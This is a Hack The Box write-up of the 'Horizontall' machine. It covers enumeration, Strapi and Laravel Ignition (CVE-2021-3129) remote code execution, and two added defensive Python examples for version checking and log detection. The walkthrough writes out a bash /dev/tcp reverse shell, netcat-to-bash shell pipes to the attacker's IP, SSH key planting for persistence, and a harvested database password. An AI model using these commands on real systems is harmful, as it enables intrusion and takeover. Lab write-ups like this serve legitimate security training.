Hack_The_Box_Writeups

HackTheBox – Horizontall Walkthrough

┌──(rootkali)-[/home/kali/Downloads]

└─# nmap -A 10.10.11.105

http://horizontall.htb/

┌──(rootkali)-[/home/kali/Downloads]

└─# gobuster dir -u http://horizontall.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 150

┌──(rootkali)-[/home/kali/Downloads]

└─# gobuster vhost -u http://horizontall.htb/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 150

┌──(rootkali)-[/home/kali/Downloads]

└─# gobuster dir -u http://api-prod.horizontall.htb/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 150

http://api-prod.horizontall.htb/reviews

http://api-prod.horizontall.htb/admin

Reading the page source gave me the next clue. The /admin endpoint is a Strapi login page; I tried basic SQL injections against it and got nothing back.

Further enumeration (blogs and CVEs about Strapi) pointed me to the version endpoint, which revealed the Strapi version:

view-source:http://api-prod.horizontall.htb/admin/strapiVersion

"strapiVersion":"3.0.0-beta.17.4"

That version is covered by exploit-db 50239 (Strapi CMS 3.0.0-beta.17.4, unauthenticated remote code execution):

https://www.exploit-db.com/exploits/50239
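Checking a fingerprinted version against the fixed releases is worth automating, because prerelease tags such as beta.17.4 do not sort correctly as plain strings (beta.17.10 would sort below beta.17.4). The Python below is an added example written for this page, not code from the writeup or from exploit 50239. It embeds the strapiVersion response as a constructed sample, and the upper bounds are the fixed versions from the NVD descriptions of CVE-2019-18818 (unauthenticated admin password reset) and CVE-2019-19609 (command injection in plugin install), the two bugs that exploit chains.

```python
"""Prerelease-aware version check for a Strapi fingerprint.

Added example, not part of the original writeup or of exploit-db 50239.
The /admin/strapiVersion response is embedded as a constructed sample so
the script runs offline.
"""
import json
import re

# Exclusive upper bounds, taken from the NVD descriptions of the two bugs.
STRAPI_FIXES = {
    "CVE-2019-18818": "3.0.0-beta.17.5",  # admin password reset without a valid code
    "CVE-2019-19609": "3.0.0-beta.17.8",  # shell injection via plugin name in install/uninstall
}

# Constructed sample of what GET /admin/strapiVersion returned on the box.
SAMPLE_RESPONSE = '{"strapiVersion":"3.0.0-beta.17.4"}'


def parse_version(v):
    """Split '3.0.0-beta.17.4' into ((3, 0, 0), ('beta', 17, 4)).

    Numeric prerelease identifiers become ints so they compare numerically;
    the rest stay strings and compare lexically (semver rules).
    """
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.\-]+))?", v.strip())
    if not m:
        raise ValueError(f"not a semver string: {v!r}")
    core = tuple(int(x) for x in m.group(1, 2, 3))
    pre = ()
    if m.group(4):
        pre = tuple(int(p) if p.isdigit() else p for p in m.group(4).split("."))
    return core, pre


def _pre_key(pre):
    # An empty prerelease is a final release and ranks above any prerelease of
    # the same core version. Numeric identifiers rank below alphanumeric ones,
    # and mixing ints and strs in one tuple would raise in Python, so tag them.
    if not pre:
        return (1, ())
    return (0, tuple((0, p) if isinstance(p, int) else (1, p) for p in pre))


def version_lt(a, b):
    """True if version string a is strictly older than b."""
    core_a, pre_a = parse_version(a)
    core_b, pre_b = parse_version(b)
    if core_a != core_b:
        return core_a < core_b
    return _pre_key(pre_a) < _pre_key(pre_b)


def extract_version(body):
    """Pull the version out of the JSON returned by /admin/strapiVersion."""
    return json.loads(body)["strapiVersion"]


def vulnerable_cves(version):
    """CVE ids (from STRAPI_FIXES) whose fixed release is newer than `version`."""
    return [cve for cve, fixed in STRAPI_FIXES.items() if version_lt(version, fixed)]


if __name__ == "__main__":
    v = extract_version(SAMPLE_RESPONSE)
    print(v, "->", vulnerable_cves(v) or "no known issue in this table")
```

A version that is exactly a fixed release is reported as clean, and a final 3.0.0 release ranks above every 3.0.0-beta tag, which is the ordering semver prescribes and the one a naive string compare gets wrong.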

┌──(rootkali)-[/home/kali/Downloads]

└─# python3 50239.py http://api-prod.horizontall.htb/

┌──(rootkali)-[/home/kali/Downloads]

└─# nc -lvnp 6969

With the listener up, I sent a reverse shell from the exploit's command prompt:

  $> bash -c 'bash -i >& /dev/tcp/10.10.14.35/6969 0>&1'

strapi@horizontall:/$ cd /opt/

strapi@horizontall:/opt$ cd strapi

strapi@horizontall:~$ cd myapi

strapi@horizontall:~/myapi$ cd config

strapi@horizontall:~/myapi/config$ cd environments

strapi@horizontall:~/myapi/config/environments$ cd development

strapi@horizontall:~/myapi/config/environments/development$ cat database.json

"username": "developer",

"password": "#J!:F9Zt2u"

strapi@horizontall:~/myapi/config/environments/development$ netstat -tulpn | grep LISTEN

While scrolling through the output, I noticed the ports listening only on the local machine. Port 3306 is the MySQL connection and port 1337 is the Strapi API, but port 8000 was strange. I ran a curl command to see what was going on there.

strapi@horizontall:~/myapi/config/environments/development$ curl http://localhost:8000

strapi@horizontall:~/myapi/config/environments/development$ cd ~

strapi@horizontall:~$ cd .ssh

strapi@horizontall:~/.ssh$ ls -lrt

strapi@horizontall:~/.ssh$ cat authorized_keys

strapi@horizontall:~/.ssh$ echo "ssh-rsa <public key omitted> root@kali" > authorized_keys

(The single > replaces whatever was already in authorized_keys; >> would have appended the key instead.)

┌──(rootkali)-[/home/kali/Downloads]

└─# ssh -i key -L 8000:127.0.0.1:8000 strapi@horizontall.htb

The -L option forwards local port 8000 to 127.0.0.1:8000 on the box, so the service bound to localhost can be reached from the attacking machine.

From the curl response it was easy to see that a Laravel v8 application was running on port 8000. A quick search for Laravel v8 turned up CVE-2021-3129, an unauthenticated remote code execution bug in the Ignition debug page that is reachable when APP_DEBUG is enabled, together with a public exploit for it:

https://github.com/nth347/CVE-2021-3129_exploit

┌──(rootkali)-[/home/kali/Downloads]

└─# git clone https://github.com/nth347/CVE-2021-3129_exploit.git

┌──(rootkali)-[/home/kali/Downloads]

└─# cd CVE-2021-3129_exploit

┌──(rootkali)-[/home/kali/Downloads/CVE-2021-3129_exploit]

└─# python3 exploit.py http://127.0.0.1:8000 Monolog/RCE1 "cat /root/root.txt"

The command ran with root privileges, so the root flag came straight back. To get an interactive shell I used the same exploit to pipe a second pair of netcat connections back to my machine:

┌──(rootkali)-[/home/kali/Downloads/CVE-2021-3129_exploit]

└─# python3 exploit.py http://127.0.0.1:8000 Monolog/RCE1 "nc 10.10.14.35 6666 | /bin/bash 2>&1 | nc 10.10.14.35 6667"
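From the defender's side this activity is easy to spot: the exploit POSTs JSON to Ignition's /_ignition/execute-solution route naming Facade\Ignition\Solutions\MakeViewVariableOptionalSolution, with a viewFile that points at the application log through a php://filter chain and, in the final stage, through phar://, and that route should not be reachable at all when APP_DEBUG is off. The Python below is an added example written for this page, not code from the writeup or from the nth347 exploit. It shows an access-log scanner and a request-body inspector (what a WAF or application middleware would see); the log lines and the request body are constructed samples in the shape of the exploit's traffic.

```python
"""Detection for CVE-2021-3129 (Laravel Ignition) probes.

Added example by the editor; not part of the original writeup or of the
nth347 exploit. All access-log lines and request bodies are constructed.
"""
import json
import re

# Constructed Combined Log Format lines (nginx/apache default format).
SAMPLE_ACCESS_LOG = [
    '10.10.14.35 - - [05/Sep/2021:14:02:09 +0000] "GET / HTTP/1.1" 200 17498 "-" "curl/7.74.0"',
    '10.10.14.35 - - [05/Sep/2021:14:02:11 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 0 "-" "python-requests/2.26.0"',
    '10.10.14.35 - - [05/Sep/2021:14:02:11 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 0 "-" "python-requests/2.26.0"',
    '10.10.14.35 - - [05/Sep/2021:14:02:12 +0000] "GET /_ignition/health-check HTTP/1.1" 200 27 "-" "python-requests/2.26.0"',
]

CLF_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

# The route CVE-2021-3129 drives, the solution class the exploit names, and
# the stream wrappers it abuses to write to and then deserialize the log.
IGNITION_ROUTE = "/_ignition/execute-solution"
SOLUTION_CLASS = "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution"
WRAPPERS = ("php://filter", "phar://")


def scan_access_log(lines):
    """Return (ip, timestamp, status) for every POST to execute-solution.

    Any hit is worth an alert on a production host: the route only exists
    with debug mode on, and a 500 next to a 200 is the exploit's log-clearing
    and payload-writing stages failing or succeeding.
    """
    hits = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m:
            continue  # not CLF; a real pipeline would count unparsed lines
        path = m["path"].split("?", 1)[0]
        if m["method"] == "POST" and path == IGNITION_ROUTE:
            hits.append((m["ip"], m["ts"], int(m["status"])))
    return hits


def inspect_body(body):
    """Reasons a JSON body sent to execute-solution looks like CVE-2021-3129.

    Returns [] for non-JSON, non-object, or benign bodies.
    """
    try:
        data = json.loads(body)
    except ValueError:
        return []
    if not isinstance(data, dict):
        return []
    reasons = []
    if data.get("solution") == SOLUTION_CLASS:
        reasons.append("solution=MakeViewVariableOptionalSolution")
    params = data.get("parameters")
    params = params if isinstance(params, dict) else {}
    view = str(params.get("viewFile", ""))
    for wrapper in WRAPPERS:
        if wrapper in view.lower():
            reasons.append(f"viewFile uses {wrapper} wrapper")
    if "../" in view:
        reasons.append("viewFile traverses directories")
    return reasons


# Constructed body in the shape of the exploit's log-writing stage: the
# solution calls file_get_contents/file_put_contents on viewFile, and the
# php://filter chain decodes the base64 payload into laravel.log.
SAMPLE_BODY = json.dumps({
    "solution": SOLUTION_CLASS,
    "parameters": {
        "variableName": "username",
        "viewFile": "php://filter/write=convert.base64-decode/resource=../storage/logs/laravel.log",
    },
})

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_ACCESS_LOG):
        print("execute-solution POST from %s at %s (status %d)" % hit)
    print(inspect_body(SAMPLE_BODY))
```

The access-log check needs no request bodies, so it works on what most web servers already record; the body inspector is the stricter check for a proxy that sees the JSON, and it also catches the final phar:// stage because that viewFile carries both a wrapper and a ../ traversal.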

Hi, I’m saksham dixit
